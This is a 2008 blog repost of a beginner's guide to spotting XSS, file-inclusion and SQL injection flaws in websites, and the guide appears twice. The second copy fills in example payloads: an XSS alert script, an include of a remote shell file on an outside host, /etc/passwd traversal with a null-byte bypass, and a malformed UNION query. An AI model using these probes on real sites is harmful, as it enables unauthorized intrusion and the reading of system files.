2008년 02월 18일
Spotting Vulnerable Websites
[ How to find vulnerabilities in websites | The Newbie Guide ]
[+] XSS :
|
|- Definition: Cross Site Scripting.
|
|- Technical Definition: Injecting HTML in a page. Permanent or not.
|
|- Example:
|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search you input, is outputted on the page. the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is outputted on the page, it is most likely
| the site is vulnerable, Checking for hidden tags also is helpfull,
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, any input form you can find in a site, could be
| vulnerable, checking it, by checking if the input is outputted.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
|
|
|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense, if you see the main page redirecting to other pages, by a GET var, it is most likely
vulnerable.
| sometimes, it might be hiding behind an integer, you can spot it by, changing that get var to anything else, and if
you see any main(); errors,
| it is vulerable.
| a common way to bypass some extension restrctions, is to nullbyte the extension, by:
|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Techical definition : Injecting a SQL, to echo out data from other tables / rows. etc.
|
| - Example:
|
|
|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the times, it is an integer that we are looking for in a GET var, for example : ' ?id=123 ' ' ?cat=22 ' ..
etc.
| if we change that integer to a quote or anything else, we could get a MySQL error, then we know that this site
might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass thru a SQL query to check
for data.
|
| [ Search Engine ]
|
| Same applies here, most search engines looks for the info in a SQL DB. we can always inject that.
|
| [ Different Forms ]
|
| The general rule applies, you can try a random SQL injection, with different quote style to see if it would show any
errors or not.
|
|______________________________________________________________________
Well that was it, I hope you learned something from this tutorial, and questions / comments are welcomed.
[+] XSS :
|
|- Definition: Cross Site Scripting.
|
|- Technical Definition: Injecting HTML in a page. Permanent or not.
|
|- Example:
<script>alert("XSS")</script>
|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search you input, is outputted on the page. the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is outputted on the page, it is most likely
| the site is vulnerable, Checking for hidden tags also is helpfull,
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, any input form you can find in a site, could be
| vulnerable, checking it, by checking if the input is outputted.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
|
?page=http:/www.darkmindz.com/shell/x2300.txt?
|
?page=../../../../etc/passwd
|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense, if you see the main page redirecting to other pages, by a GET var, it is most likely
vulnerable.
| sometimes, it might be hiding behind an integer, you can spot it by, changing that get var to anything else, and if
you see any main(); errors,
| it is vulerable.
| a common way to bypass some extension restrctions, is to nullbyte the extension, by:
?page=../../../../etc/passwd%00
|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Techical definition : Injecting a SQL, to echo out data from other tables / rows. etc.
|
| - Example:
|
|
?id=-- UNION SELECT ALL FROM USERS /*
|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the times, it is an integer that we are looking for in a GET var, for example : ' ?id=123 ' ' ?cat=22 ' ..
etc.
| if we change that integer to a quote or anything else, we could get a MySQL error, then we know that this site
might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass thru a SQL query to check
for data.
|
| [ Search Engine ]
|
| Same applies here, most search engines looks for the info in a SQL DB. we can always inject that.
|
| [ Different Forms ]
|
| The general rule applies, you can try a random SQL injection, with different quote style to see if it would show any
errors or not.
|
|______________________________________________________________________
Well that was it, I hope you learned something from this tutorial, and questions / comments are welcomed.
이 글과 관련있는 글을 자동검색한 결과입니다 [?]
# by | 2008/02/18 20:11 | →Basic Articles | 트랙백 | 핑백(1)
☞ 내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]
... because most login … MySQL SecurityMySQL Security Continued here: Spotting Vulnerable Websites mysql unicodemysql unicodeRelated Posts login to egix Browsing for ... more